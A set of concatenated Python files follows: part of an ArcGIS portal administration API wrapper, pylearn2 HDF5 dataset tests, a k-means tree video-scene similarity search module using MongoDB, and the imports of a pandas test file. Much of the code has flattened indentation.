def portalRoot(self):
""" returns the base url without the portal id """
return self._baseURL
#----------------------------------------------------------------------
def addResource(self, key, filePath, text):
"""
The add resource operation allows the administrator to add a file
resource, for example, the organization's logo or custom banner.
The resource can be used by any member of the organization. File
resources use storage space from your quota and are scanned for
viruses.
Inputs:
key - The name the resource should be stored under.
filePath - path of file to upload
text - Some text to be written (for example, JSON or JavaScript)
directly to the resource from a web client.
"""
url = self._url + "/addresource"
params = {
"f": "json",
"token" : self._securityHandler.token,
"key" : key,
"text" : text
}
parsed = urlparse.urlparse(url)
files = []
files.append(('file', filePath, os.path.basename(filePath)))
res = self._post_multipart(host=parsed.hostname,
selector=parsed.path,
files = files,
fields=params,
port=parsed.port,
ssl=parsed.scheme.lower() == 'https',
proxy_port=self._proxy_port,
proxy_url=self._proxy_url)
return res
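    # Illustrative call (a sketch; the key and file path are hypothetical):
    #   portals.addResource(key="logo", filePath="/tmp/logo.png", text="")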
#----------------------------------------------------------------------
def checkServiceName(self,
name,
serviceType):
"""
Checks to see if a given service name and type are available for
publishing a new service. true indicates that the name and type is
not found in the organization's services and is available for
publishing. false means the requested name and type are not available.
Inputs:
name - requested name of service
serviceType - type of service allowed values: Feature Service or
Map Service
"""
_allowedTypes = ['Feature Service', "Map Service"]
url = self._url + "/isServiceNameAvailable"
params = {
"f" : "json",
"token" : self._securityHandler.token,
"name" : name,
"type" : serviceType
}
return self._do_get(url=url,
param_dict=params,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
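    # Illustrative call (a sketch; the response shape is assumed from the
    # REST endpoint this wraps):
    #   res = portals.checkServiceName("Parcels", "Feature Service")
    #   # e.g. {"available": true} when the name/type combination is free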
#----------------------------------------------------------------------
def inviteUser(self, invitationList, html, subject):
"""Invites a user or users to a site.
Inputs:
invitationList - either an UserInvite object or a list of
UserInvite object.
html - text of invite email with HTML formatting
subject - subject of email to send
"""
url = self._baseURL + "/self/invite"
params = {
"f" : "json",
"token" : self._securityHandler.token,
"html" : html,
"subject" : subject
}
if isinstance(invitationList, UserInvite):
params['invitationList'] = {"invitations":[invitationList.value]}
elif isinstance(invitationList, list) and \
isinstance(invitationList[0], UserInvite):
params['invitationList'] = {"invitations":[iL.value for iL in invitationList]}
return self._do_post(url=url, param_dict=params,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
#----------------------------------------------------------------------
@property
def languages(self):
""" list of available languages """
url = self._url + "/languages"
params = {
"f" : "json",
"token" : self._securityHandler.token,
}
return self._do_get(url=url,
param_dict=params,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
#----------------------------------------------------------------------
@property
def portalProperties(self):
"""
Portal returns information on your organization and is accessible
to administrators. Publishers and information workers can view
users and resources of the organization.
"""
url = self._url
params = {
"f" : "json",
"token" : self._securityHandler.token
}
return self._do_get(url=url,
param_dict=params,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
#----------------------------------------------------------------------
def portalSelf(self, culture=None, region=None):
"""
The Portal Self resource is used to return the view of the portal
as seen by the current user, anonymous or logged in. It includes
information such as the name, logo, featured items, and supported
protocols (HTTP vs. HTTPS) for this portal. If the user is not
logged in, this call will return the default view of the portal. If
the user is logged in, the view of the returned portal will be
specific to the organization to which the user belongs. The default
view of the portal is dependent on the culture of the user, which
is obtained from the user's profile. A parameter to pass in the
locale/culture is available for anonymous users.
Inputs:
culture - the culture code of the calling client output is
customized for this culture if settings are available
region - the region code of the calling client.
"""
url = self._url + "/self"
params = {
"f" : "json",
"token" : self._securityHandler.token,
}
if culture is not None:
params['culture'] = culture
if region is not None:
params['region'] = region
res = self._do_get(url=url,
param_dict=params,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
ps = PortalSelf(res)
return ps
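    # Illustrative usage (a sketch):
    #   view = portals.portalSelf(culture="en")
    #   print view.name, view.portalMode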
#----------------------------------------------------------------------
@property
def regions(self):
"""
Lists the available regions
"""
url = self._url + "/regions"
params = {
"f" : "json",
"token" : self._securityHandler.token
}
return self._do_get(url=url,
param_dict=params,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
#----------------------------------------------------------------------
def registerServer(self,
name,
url,
adminUrl,
isHosted,
serverType):
"""
You can optionally register (or "federate") an ArcGIS Server site
with your Portal for ArcGIS deployment. This provides the
following benefits:
The server and the portal share the same user store (that of
the portal). This results in a convenient single sign-on
experience.
Any items you publish to the server are automatically shared
on the portal.
You can optionally allow the server to host tiled map services
and feature services published by portal users.
After you register a server with your portal, you must invoke the
Update Security Configuration operation on the ArcGIS Server site
and configure the site's security store to take advantage of users
and roles from the portal.
This operation is only applicable to Portal for ArcGIS; it is not
supported with ArcGIS Online.
Inputs:
name - The fully qualified name of the machine hosting the
ArcGIS Server site, followed by the port.
url - The externally visible URL of the ArcGIS Server site,
using the fully qualified name of the machine.
adminUrl - The administrative URL of your ArcGIS Server site,
using the fully qualified name of the machine.
isHosted - A Boolean property denoting whether the ArcGIS Server
site will be allowed to host services for the portal
(true) or not be allowed to host services (false).
serverType - The type of server being registered with the portal
For example: ArcGIS.
"""
        registerURL = self._url + "/register"
        params = {
            "f" : "json",
            "token" : self._securityHandler.token,
            "url" : url,
            "adminUrl" : adminUrl,
            "isHosted" : isHosted,
            "name" : name,
            "serverType" : serverType
        }
        return self._do_get(url=registerURL,
                            param_dict=params,
                            proxy_url=self._proxy_url,
                            proxy_port=self._proxy_port)
#----------------------------------------------------------------------
def removeResource(self, key):
"""
The Remove Resource operation allows the administrator to remove a
file resource.
Input:
key - name of resource to delete
"""
url = self._url + "/removeresource"
params = {
"key" : key,
"f" : "json",
"token" : self._securityHandler.token
}
return self._do_get(url=url,
param_dict=params,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
#----------------------------------------------------------------------
def removeUser(self, users):
"""
The Remove Users operation allows the administrator to remove users
from a portal. Before the administrator can remove the user, all of
the user's content and groups must be reassigned or deleted.
Inputs:
users - Comma-separated list of usernames to remove.
"""
url = self._url + "/removeusers"
params = {
"f" : "json",
"token" : self._securityHandler.token,
"users" : users
}
return self._do_post(url=url, param_dict=params,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
#----------------------------------------------------------------------
def resources(self,
start=1,
num=10):
"""
Resources lists all file resources for the organization. The start
and num paging parameters are supported.
Inputs:
start - the number of the first entry in the result set response
The index number is 1-based and the default is 1
num - the maximum number of results to be returned as a whole #
"""
url = self._url + "/resources"
params = {
"f" : "json",
"token" : self._securityHandler.token,
"start" : start,
"num" : num
}
return self._do_get(url=url,
param_dict=params,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
#----------------------------------------------------------------------
def server(self, serverId):
"""
This resource represents an ArcGIS Server site that has been
federated with the portal.
This resource is not applicable to ArcGIS Online; it is only
applicable to Portal for ArcGIS.
"""
url = self._url + "/servers/%s" % serverId
params = {
"f" : "json",
"token" : self._securityHandler.token
}
return self._do_get(url=url,
param_dict=params,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
#----------------------------------------------------------------------
@property
def servers(self):
"""
This resource lists the ArcGIS Server sites that have been
federated with the portal. This resource is not applicable to
ArcGIS Online; it is only applicable to Portal for ArcGIS.
"""
url = self._url + "/servers"
params = {
"f" : "json",
"token" : self._securityHandler.token
}
return self._do_get(url=url,
param_dict=params,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
#----------------------------------------------------------------------
def unregisterServer(self, serverId):
"""
This operation unregisters an ArcGIS Server site from the portal.
The server is no longer federated with the portal after this
operation completes.
After this operation completes, you must invoke the Update Security
Configuration operation on your ArcGIS Server site to specify how
you want the server to work with users and roles.
Inputs:
serverId - unique identifier of the server
"""
url = self._url + "/servers/%s/unregister" % serverId
params = {
"f" : "json",
"token" : self._securityHandler.token
}
return self._do_post(url=url,
param_dict=params,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
#----------------------------------------------------------------------
def update(self,
updatePortalParameters,
clearEmptyFields=False):
"""
        The Update operation allows administrators to update the
        organization information such as the name, description, thumbnail,
        and featured groups.
        Inputs:
           updatePortalParameters - parameters.PortalParameters object that
                                    holds the information to update
           clearEmptyFields - boolean that clears all whitespace from fields
"""
url = self._url + "/update"
params = {
"f" : "json",
"token" : self._securityHandler.token,
"clearEmptyFields" : clearEmptyFields
}
if isinstance(updatePortalParameters, parameters.PortalParameters):
params.update(updatePortalParameters.value)
else:
            raise AttributeError("updatePortalParameters must be of type parameters.PortalParameters")
return self._do_post(url=url,
param_dict=params,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
#----------------------------------------------------------------------
def updateServer(self,
serverId,
name,
url,
adminUrl,
isHosted,
serverType):
"""
This operation updates the properties of an ArcGIS Server site that
has been registered, or federated, with the portal. For example,
you can use this operation to change the federated site that acts
as the portal's hosting server.
Inputs:
serverId - identifier of server to update.
name - The fully qualified name of the machine hosting the
ArcGIS Server site, followed by the port.
url - The externally visible URL of the ArcGIS Server site,
using the fully qualified name of the machine.
adminUrl - The administrative URL of the ArcGIS Server site,
using the fully qualified name of the machine.
isHosted - A Boolean property denoting whether the ArcGIS Server
site will be allowed to host services for the portal
(true) or will not be allowed to host services
(false).
serverType - The type of server being registered with the portal
For example: ArcGIS.
"""
        updateURL = self._url + "/servers/%s/update" % serverId
        params = {
            "f" : "json",
            "token" : self._securityHandler.token,
            "name" : name,
            "url" : url,
            "adminUrl" : adminUrl,
            "isHosted" : isHosted,
            "serverType" : serverType
        }
        return self._do_post(url=updateURL,
                             param_dict=params,
                             proxy_url=self._proxy_url,
                             proxy_port=self._proxy_port)
#----------------------------------------------------------------------
def updateUserRole(self,
user,
role):
"""
        The Update User Role operation allows the administrator of an
        organization to update the role of a user within a portal.
Inputs:
role - Sets the user's role.
Roles are the following:
org_user - Ability to add items, create groups, and
share in the organization.
org_publisher - Same privileges as org_user plus the
ability to publish hosted services from ArcGIS for
Desktop and ArcGIS Online.
org_admin - In addition to add, create, share, and publish
capabilities, an org_admin administers and customizes
the organization.
Example: role=org_publisher
user - The username whose role you want to change.
"""
url = self._url + "/updateuserrole"
params = {
"f" : "json",
"token" : self._securityHandler.token,
"user" : user,
"role" : role
}
return self._do_post(url=url,
param_dict=params,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
#----------------------------------------------------------------------
def users(self, start=1, num=10):
"""
Lists all the members of the organization. The start and num paging
parameters are supported.
Inputs:
start - The number of the first entry in the result set response.
The index number is 1-based.
The default value of start is 1 (that is, the first
search result).
The start parameter, along with the num parameter, can
be used to paginate the search results.
num - The maximum number of results to be included in the result
set response.
The default value is 10, and the maximum allowed value is
100.The start parameter, along with the num parameter, can
be used to paginate the search results.
"""
url = self._url + "/users"
params = {
"f" : "json",
"token" : self._securityHandler.token,
"start" : start,
"num" : num
}
return self._do_post(url=url,
param_dict=params,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
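    # Illustrative paging sketch: fetch the membership 100 users at a time
    #   page1 = portals.users(start=1, num=100)
    #   page2 = portals.users(start=101, num=100)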
|
|
"""
HDF5 dataset tests.
"""
import numpy as np
import os
import tempfile
from pylearn2.config import yaml_parse
from pylearn2.testing.datasets import (
random_dense_design_matrix,
random_one_hot_dense_design_matrix,
random_one_hot_topological_dense_design_matrix)
from pylearn2.testing.skip import skip_if_no_h5py
def test_hdf5_design_matrix():
"""Train using an HDF5 dataset."""
skip_if_no_h5py()
import h5py
# save random data to HDF5
    handle, filename = tempfile.mkstemp()
    os.close(handle)  # close the low-level handle; h5py reopens the file
dataset = random_one_hot_dense_design_matrix(np.random.RandomState(1),
num_examples=10, dim=5,
num_classes=3)
with h5py.File(filename, 'w') as f:
f.create_dataset('X', data=dataset.get_design_matrix())
f.create_dataset('y', data=dataset.get_targets())
# instantiate Train object
trainer = yaml_parse.load(design_matrix_yaml % {'filename': filename})
trainer.main_loop()
# cleanup
os.remove(filename)
def test_hdf5_topo_view():
"""Train using an HDF5 dataset with topo_view instead of X."""
skip_if_no_h5py()
import h5py
# save random data to HDF5
    handle, filename = tempfile.mkstemp()
    os.close(handle)  # close the low-level handle; h5py reopens the file
dataset = random_one_hot_topological_dense_design_matrix(
np.random.RandomState(1), num_examples=10, shape=(2, 2), channels=3,
axes=('b', 0, 1, 'c'), num_classes=3)
with h5py.File(filename, 'w') as f:
f.create_dataset('topo_view', data=dataset.get_topological_view())
f.create_dataset('y', data=dataset.get_targets())
# instantiate Train object
trainer = yaml_parse.load(topo_view_yaml % {'filename': filename})
trainer.main_loop()
# cleanup
os.remove(filename)
def test_hdf5_convert_to_one_hot():
"""Train using an HDF5 dataset with one-hot target conversion."""
skip_if_no_h5py()
import h5py
# save random data to HDF5
    handle, filename = tempfile.mkstemp()
    os.close(handle)  # close the low-level handle; h5py reopens the file
dataset = random_dense_design_matrix(np.random.RandomState(1),
num_examples=10, dim=5, num_classes=3)
with h5py.File(filename, 'w') as f:
f.create_dataset('X', data=dataset.get_design_matrix())
f.create_dataset('y', data=dataset.get_targets())
# instantiate Train object
trainer = yaml_parse.load(convert_to_one_hot_yaml % {'filename': filename})
trainer.main_loop()
# cleanup
os.remove(filename)
def test_hdf5_load_all():
"""Train using an HDF5 dataset with all data loaded into memory."""
skip_if_no_h5py()
import h5py
# save random data to HDF5
    handle, filename = tempfile.mkstemp()
    os.close(handle)  # close the low-level handle; h5py reopens the file
dataset = random_one_hot_dense_design_matrix(np.random.RandomState(1),
num_examples=10, dim=5,
num_classes=3)
with h5py.File(filename, 'w') as f:
f.create_dataset('X', data=dataset.get_design_matrix())
f.create_dataset('y', data=dataset.get_targets())
# instantiate Train object
trainer = yaml_parse.load(load_all_yaml % {'filename': filename})
trainer.main_loop()
# cleanup
os.remove(filename)
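# The YAML fixtures below construct HDF5Dataset declaratively; an equivalent
# programmatic construction (a sketch mirroring the YAML, reusing a
# `filename` written as in the tests above) would be:
#   from pylearn2.datasets.hdf5 import HDF5Dataset
#   dataset = HDF5Dataset(filename=filename, X='X', y='y')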
design_matrix_yaml = """
!obj:pylearn2.train.Train {
dataset: &train !obj:pylearn2.datasets.hdf5.HDF5Dataset {
filename: %(filename)s,
X: X,
y: y,
},
model: !obj:pylearn2.models.mlp.MLP {
layers: [
!obj:pylearn2.models.mlp.Sigmoid {
layer_name: h0,
dim: 10,
irange: .005,
},
!obj:pylearn2.models.mlp.Softmax {
layer_name: y,
n_classes: 3,
irange: 0.
}
],
nvis: 5,
},
algorithm: !obj:pylearn2.training_algorithms.sgd.SGD {
batch_size: 5,
learning_rate: .1,
monitoring_dataset:
{
'train' : *train,
},
termination_criterion:
!obj:pylearn2.termination_criteria.EpochCounter {
max_epochs: 1,
},
},
}
"""
topo_view_yaml = """
!obj:pylearn2.train.Train {
dataset: &train !obj:pylearn2.datasets.hdf5.HDF5Dataset {
filename: %(filename)s,
topo_view: topo_view,
y: y,
},
model: !obj:pylearn2.models.mlp.MLP {
layers: [
!obj:pylearn2.models.mlp.Sigmoid {
layer_name: h0,
dim: 10,
irange: .005,
},
!obj:pylearn2.models.mlp.Softmax {
layer_name: y,
n_classes: 3,
irange: 0.
}
],
nvis: 12,
},
algorithm: !obj:pylearn2.training_algorithms.sgd.SGD {
batch_size: 5,
learning_rate: .1,
monitoring_dataset:
{
'train' : *train,
},
termination_criterion:
!obj:pylearn2.termination_criteria.EpochCounter {
max_epochs: 1,
},
},
}
"""
convert_to_one_hot_yaml = """
!obj:pylearn2.train.Train {
dataset: &train !obj:pylearn2.datasets.hdf5.HDF5Dataset {
filename: %(filename)s,
X: X,
y: y,
y_labels: 3
},
model: !obj:pylearn2.models.mlp.MLP {
layers: [
!obj:pylearn2.models.mlp.Sigmoid {
layer_name: h0,
dim: 10,
irange: .005,
},
!obj:pylearn2.models.mlp.Softmax {
layer_name: y,
n_classes: 3,
irange: 0.
}
],
nvis: 5,
},
algorithm: !obj:pylearn2.training_algorithms.sgd.SGD {
batch_size: 5,
learning_rate: .1,
monitoring_dataset:
{
'train' : *train,
},
termination_criterion:
!obj:pylearn2.termination_criteria.EpochCounter {
max_epochs: 1,
},
},
}
"""
load_all_yaml = """
!obj:pylearn2.train.Train {
dataset: &train !obj:pylearn2.datasets.hdf5.HDF5Dataset {
filename: %(filename)s,
X: X,
y: y,
load_all: 1,
},
model: !obj:pylearn2.models.mlp.MLP {
layers: [
!obj:pylearn2.models.mlp.Sigmoid {
layer_name: h0,
dim: 10,
irange: .005,
},
!obj:pylearn2.models.mlp.Softmax {
layer_name: y,
n_classes: 3,
irange: 0.
}
],
nvis: 5,
},
algorithm: !obj:pylearn2.training_algorithms.sgd.SGD {
batch_size: 5,
learning_rate: .1,
monitoring_dataset:
{
'train' : *train,
},
termination_criterion:
!obj:pylearn2.termination_criteria.EpochCounter {
max_epochs: 1,
},
},
}
"""
|
|
import numpy as npy
import random as rand
import sys
import Queue
import pickle
import math
import os.path
import threading
import processhandler
import time
from pymongo import MongoClient
FILE_TREE = "_tree.db"
FILE_DEL = "_deletedVideos.db"
FILE_ADD = "_addedScenes.db"
lock = threading.Lock()
"""
Returns children for the given arguments.
They are most of the times don't have childs
of there own yet but if so there is a second
return value with the data the subchilds will
be made off.
@param data [(features, key),...] List of pairs of features and keys
@param k Giving the max amount of leaves a node should have
@param maxiterations limiting the iterations for the center finding
@param recdepth Don't mind me. Debuggin reasons
@return [(child, data)], where data is None if the child is a leave
"""
def buildTree(data, k, maxiterations, recdepth = 0):
    # Output to get a feeling for how long it takes (a long time):
    # 76 minutes for 1,000,000 entries with 1024-dimensional vectors
    align = " " * recdepth
    print align, recdepth, ": len(data): ", len(data)
# Get random centers as starting point
centers = calg(data,k)
centersFound = False
iterations = 0
# Improve the centers
while not centersFound and iterations < maxiterations:
iterations += 1
clusters = []
for _ in range(len(centers)):
clusters.append([])
# cluster the points around the closest centers
for position,value in data:
index = 0
mindist = sys.maxint
for i,center in enumerate(centers):
distance = dist(position, center)
if distance < mindist:
mindist = distance
index = i
clusters[index].append((position, value))
centersNew = []
# calculate new centers
for cluster in clusters:
if not cluster == []:
center = npy.mean(npy.transpose([i[0] for i in cluster]), axis=1, dtype=npy.int)
centersNew.append(center)
if len(centersNew) == 1:
tmp = [[] for i in range(k)]
for i,v in enumerate(clusters[0]):
tmp[i%k].append(v)
res = []
for cluster in tmp:
if len(cluster) < k:
child = KMeansTree(True, center, cluster)
res.append((child, None))
else:
child = KMeansTree(False, center, [])
res.append((child, cluster))
return res
# Check if the centers changed
if npy.array_equal(centers, centersNew):
centersFound = True
centers = centersNew
res = []
for center,cluster in zip(centers,clusters):
if len(cluster) < k:
# Create a child for each cluster
child = KMeansTree(True, center, cluster)
res.append((child, None))
else:
child = KMeansTree(False, center, [])
res.append((child, cluster))
return res
"""
Builds a tree, multithreaded (processed)
@param result Result of the last build. So it't really rather the tasts that there are
@param parent Parent of the childs in result
@param processHandler Object to create processes
@param k k the split factor for the tree
@param maxiterations maxiterations factor for the tree
@param recdepth Debugging reasons
"""
def treeBuilder(result, parent, processHandler, k, maxiterations, recdepth=0):
for (tree,data) in result:
if not tree.isLeave:
if len(data) < 42:
res = buildTree(data=data, k=k, maxiterations=maxiterations, recdepth=recdepth)
treeBuilder(result=res, parent=tree, processHandler=processHandler, k=k, maxiterations=maxiterations, recdepth=recdepth)
else:
processHandler.runTask(priority=1, onComplete=treeBuilder, onCompleteArgs=(), onCompleteKwargs={"parent":tree, "processHandler":processHandler, "k":k, "maxiterations":maxiterations, "recdepth":recdepth}, target=buildTree, args=(), kwargs={"data":data, "k":k, "maxiterations":maxiterations, "recdepth":recdepth}, name=None)
lock.acquire()
try:
for (tree,_) in result:
if parent != None:
parent.children.append(tree)
finally:
lock.release()
class KMeansTree:
isLeave = False
center = []
    # When the node is a leaf this field is abused for the data
children = []
def __init__(self, isLeave, center, children):
self.isLeave = isLeave
self.center = center
self.children = children
"""
Searches in the tree
@param query Feature array for the request. Find NNs to this one
@param deletedVideos Dictornary containing videos which shouldn't be found
@param wantedNNs Amount of NNs to be found
@param maxPointsToTouch Limit of leaves that get touched. Higher value -> better results but slower calculation
@return Priority Queue with the results
"""
def search(self, query, deletedVideos, wantedNNs=1, maxPointsToTouch=42):
# for the nodes that get checked later
nextNodes = Queue.PriorityQueue()
# for the results
results = Queue.PriorityQueue()
# search from root
self.traverse(nextNodes, results, query, deletedVideos)
# while there are nextNodes and the max amount of points or the number of NNs is not reached
while (not nextNodes.empty()) and (results.qsize() < maxPointsToTouch or results.qsize() < wantedNNs):
            # get the next closest node
_,nextNode = nextNodes.get()
# and continue searching there
nextNode.traverse(nextNodes, results, query, deletedVideos)
res = []
for i in range(wantedNNs):
if results.empty():
return res
res.append(results.get())
return res
"""
Travereses the tree for the search
@param nextNodes PrioQueue for 'checkout-later'-nodes
@param results PrioQueue for the results
@param query Feature array for the request. Find NNs to this one.
@param deletedVideos Dictornary containing videos which shouldn't be found
"""
def traverse(self, nextNodes, results, query, deletedVideos):
if self.isLeave:
            # put the leaf's entries into the results
for center,value in self.children:
if not value[0] in deletedVideos:
results.put((dist(query, center),value))
else:
# find the closest child
closestChild = None
mindist = sys.maxint
for child in self.children:
distance = dist(child.center, query)
if distance < mindist:
                    # push the previously closest child onto the check-later
                    # queue; this way every child except the actual closest
                    # one ends up there
if not closestChild == None:
nextNodes.put((mindist,closestChild))
mindist = distance
# set new closest child
closestChild = child
else:
# add the child to the later to check nodes
nextNodes.put((distance,child))
if closestChild == None:
return
# go on searching in the closest child
closestChild.traverse(nextNodes, results, query, deletedVideos)
"""
To String for debugging
"""
def __str__(self):
return self.str2("")
def str2(self,i):
retval = i
if self.isLeave:
retval += i + " [" + str(self.children) + " - " + str(self.center) + "]"
else:
retval += "Node:[" + str(self.center) + "\n"
for c in self.children:
retval += c.str2(i + " ") + "\n"
retval += i + "]"
return retval
# Calculate the Euclidean distance between two arrays
def dist(array1, array2):
return npy.linalg.norm(array1 - array2)
# Reservoir-samples k initial centers: every feature vector in arr ends up in
# the result with equal probability.
# TODO: Crappy center selection algorithm. Should be replaced with something cooler.
def calg(arr,k):
result = []
N = 0
for x,_ in arr:
N += 1
if len(result) < k:
result.append(x)
else:
s = int(rand.random() * N)
if s < k:
result[s] = x
return result
class SearchHandler:
# Name for the filenames
name = None
# Collection containing the videos
videos = None
    # Weight for the flattening
featureWeight = 0.5
# KMeans-Tree
tree = None
# List for now
addedScenes = []
# Dict of all videos that shouldn't be found
deletedVideos = dict()
# ProcessHander for multiprocessing
processHandler = None
# Shadow copy to keep it updated
shadowCopy = None
    # Not the actual maximal distance between vectors, but anything beyond this distance is no match at all
    max_dist = 1100.0 # the average distance is normalized to 1000; a pair at roughly the average distance counts as a 10% match
"""
Loads a tree from a file if the file exists, else it
builds the tree from a given a collection containing videodata
Use self.processHandler.waitForPriority(priority=1, waitTime=10) to wait till the tree is fully build.
This module assumes that you never build more than one tree at once.
@param videos The collection
@param filename filename of the tree
@param k Splittingfactor k
@param imax max iterations for the center finding
@param forceRebuild If true the tree will get rebuild no matter if the files exist
"""
def __init__(self, videos, name, featureWeight=0.5, processHandler=None):
if not (featureWeight >= 0.0 and featureWeight <= 1.0):
print ("Illegal weight parameter (" + str(featureWeight) + "), defaulting to 0.5/0.5\n")
featureWeight = 0.5
self.name = name
self.videos = videos
self.featureWeight = featureWeight
self.processHandler = processHandler
self.shadowCopy = None
self.addedScenes = []
self.deletedVideos = dict()
"""
Loads the tree or builds it if needed/requested
@param k Splitfactor for the tree
@param imax iterations factor for the tree
@param forceRebuild if true the tree won't be loaded even if one exists
"""
def loadOrBuildTree(self, k=8, imax=100, forceRebuild=False):
# Try to load the tree from the file
if os.path.isfile(self.name + FILE_TREE) and (not forceRebuild):
print "Loading Tree from file"
self.tree = pickle.load(open(self.name + FILE_TREE, "rb"))
# Read files for deleted videos/added videos
if os.path.isfile(self.name + FILE_DEL):
self.deletedVideos = pickle.load(open(self.name + FILE_DEL, "rb"))
if os.path.isfile(self.name + FILE_ADD):
self.addedScenes = pickle.load(open(self.name + FILE_ADD, "rb"))
# Build the tree
else:
print "Reading data from database"
data = self.processHandler.runTaskWait(priority=1, target=self.readFromDB, kwargs={"db":self.videos.database.name, "collection":self.videos.name})
print "Building Tree"
self.tree = KMeansTree(False, [], [])
treeBuilder(result=[(self.tree, data)], processHandler=self.processHandler, parent=None, k=k, maxiterations=imax)
self.processHandler.waitForPriority(priority=1, waitTime=10)
#time.sleep(200)
print "Saving Tree"
pickle.dump(self.tree, open(self.name + FILE_TREE, "wb"))
pickle.dump(self.deletedVideos, open(self.name + FILE_DEL, "wb"))
pickle.dump(self.addedScenes, open(self.name + FILE_ADD, "wb"))
"""
Reads the feature data from the database and flattens it.
    @param db name of the database
@param collection name of the collection
@return a list like [(feature,(vidHash,sceneId))]
where
            feature is the flattened features of the scene
vidHash the hash of the video
sceneId the ID of the scene in the video
"""
def readFromDB(self, db, collection):
client = MongoClient(port=8099)
db = client[db]
videos = db[collection]
vids = videos.find({'searchable' : True})
data = []
# Get all scenes for all searchable videos
for vid in vids:
scenes = vid['scenes']
vidHash = vid['_id']
for scene in scenes:
sceneId = scene['_id']
# Flatten the features
feature = self.flattenFeatures(scene)
data.append((feature,(vidHash,sceneId)))
return data
"""
    Flattens the features for a scene
    @param scene the scene containing the different features
    @return the flattened features
"""
def flattenFeatures(self, scene):
edgeweight = self.featureWeight
colorweight = 1 - self.featureWeight
maxweight = max(edgeweight, colorweight)
colors = npy.array(scene["colorhist"])
edges = npy.array(scene["edges"])
#Normalize both features
# f_norm = (f - f_mean) / f_deviation
colors -= 500
edges -= 981
colors /= math.sqrt(4697656.84452)
edges /= math.sqrt(2980531.28808)
#Supersample colorhists to compensate for different length of vectors
        #colors *= math.sqrt(2.8125) # 360/128 That's what it should have been
        colors *= math.sqrt(2.5) # 320/128 # not actually the correct magic number, but benchmarking settled on this value
        # Which is fine, because the weighting below basically performs the same kind of operation afterwards
# "mean" distance is now 1; mutliply with sqrt(x) to project to 'x'
# also, multiply features with their weight
colors *= math.sqrt(colorweight / maxweight * 1000)
edges *= math.sqrt(edgeweight / maxweight * 1000)
result = npy.append(colors, edges)
return result #npy.array(scene['colorhist'])
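    # Worked example (illustrative): with the default featureWeight of 0.5
    # both weights are 0.5, so weight/maxweight == 1. A color bin of 600
    # then maps to
    #   (600 - 500) / sqrt(4697656.84452) * sqrt(2.5) * sqrt(1000) ~= 2.31
    # in the flattened vector.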
"""
Calculates a precent value for a distance
@param dist distance in the tree
@return a value between 0 and 100
"""
def distQuality(self, dist):
# 1000 fits well with the way our flattening works
v = (1 - (dist/1000))
return max(v, 0)
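    # Quick sanity check of the mapping above (illustrative):
    #   distQuality(500.0) -> 0.5, distQuality(1200.0) -> 0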
"""
Search for a scene from a collection
@param tree kmeans tree to search on
@param vidHash id of the video of the query scene
@param sceneId id of the query scene
@param wantedNNs amount of NNs you want
@param maxTouches how many leaves should be touched at max. currently not different to wantedNNs
@return PrioriyQueue containing the results (>= wantedNNs if the tree is big enough)
"""
def search(self, vidHash, sceneId, wantedNNs=100, maxTouches=100, filterChecked=False):
# Get feature of query scene
vid = self.videos.find_one({'_id':vidHash})
scene = vid['scenes'][sceneId]
query = self.flattenFeatures(scene)
# Copy the list of videos which won't be found and add the source Video
toIgnore = self.deletedVideos.copy()
if not filterChecked:
toIgnore[vidHash] = True
# Search in the tree
results = self.processHandler.runTaskWait(priority=3, target=self.tree.search, args=(query, toIgnore, wantedNNs, maxTouches))
resqueue = Queue.PriorityQueue()
for result in results:
resqueue.put(result)
# Add the newlyUploaded scenes to the results
for feature,(video, scene) in self.addedScenes:
if filterChecked or (video != vidHash):
resqueue.put((dist(query,feature),(video, scene)))
results = []
for i in range(wantedNNs):
if resqueue.empty():
break
results.append(resqueue.get())
return results
"""
    Add a video after the tree is built
It will be kept in an extra list
@param vidHash hash of the video
"""
def addVideo(self, vidHash):
# Keep the ShadowCopy updated
if self.shadowCopy != None:
self.shadowCopy.addVideo(vidHash)
vid = self.videos.find_one({'_id':vidHash})
if vid['searchable']:
if vidHash in self.deletedVideos:
self.deletedVideos.pop(vidHash)
pickle.dump(self.deletedVideos, open(self.name + FILE_DEL, "wb"))
else:
# Check if the video is on the addedScenes list already
for _,(vidId,_) in self.addedScenes:
if vidHash == vidId:
return
# If not add it to it
scenes = vid['scenes']
for scene in scenes:
sceneId = scene['_id']
feature = self.flattenFeatures(scene)
self.addedScenes.append((feature,(vidHash,sceneId)))
pickle.dump(self.addedScenes, open(self.name + FILE_ADD, "wb"))
"""
Disable a video so it can't be found anymore
@param vidHash hash of the video
"""
def deleteVideo(self, vidHash):
# Keep the ShadowCopy updated
if self.shadowCopy != None:
self.shadowCopy.deleteVideo(vidHash)
# Add to the deleted videos list
if not vidHash in self.deletedVideos:
self.deletedVideos[vidHash] = True
pickle.dump(self.deletedVideos, open(self.name + FILE_DEL, "wb"))
# Delete it from the dynamic list
addedScenesNew = []
needsSaving = False
for feature,(vidId,sceneNo) in self.addedScenes:
if not vidHash == vidId:
addedScenesNew.append((feature,(vidId,sceneNo)))
else:
needsSaving = True
if needsSaving:
self.addedScenes = addedScenesNew
pickle.dump(self.addedScenes, open(self.name + FILE_ADD, "wb"))
if __name__ == '__main__':
    # Example code
    #"""
    client = MongoClient(port=8099)
    db = client["findvid"]
    videos = db["benchmark"]
    vid = videos.find_one({'filename':{'$regex':'.*target.*'}})
    searchHandler = SearchHandler(videos, "testvidhandler",
                                  processHandler=processhandler.ProcessHandler())
    searchHandler.loadOrBuildTree(forceRebuild=True)
    searchHandler.addVideo(vid['_id'])
    results = searchHandler.search(vid['_id'], 0, 100, 1000, True)
    for (d, match) in results[:10]:
        print (searchHandler.distQuality(d), match)
    #"""
|
|
# -*- coding: utf-8 -*-
import numpy as np
import pytest
from pandas._libs import lib, writers as libwriters
from pandas import Index
import pandas.util.testing as tm
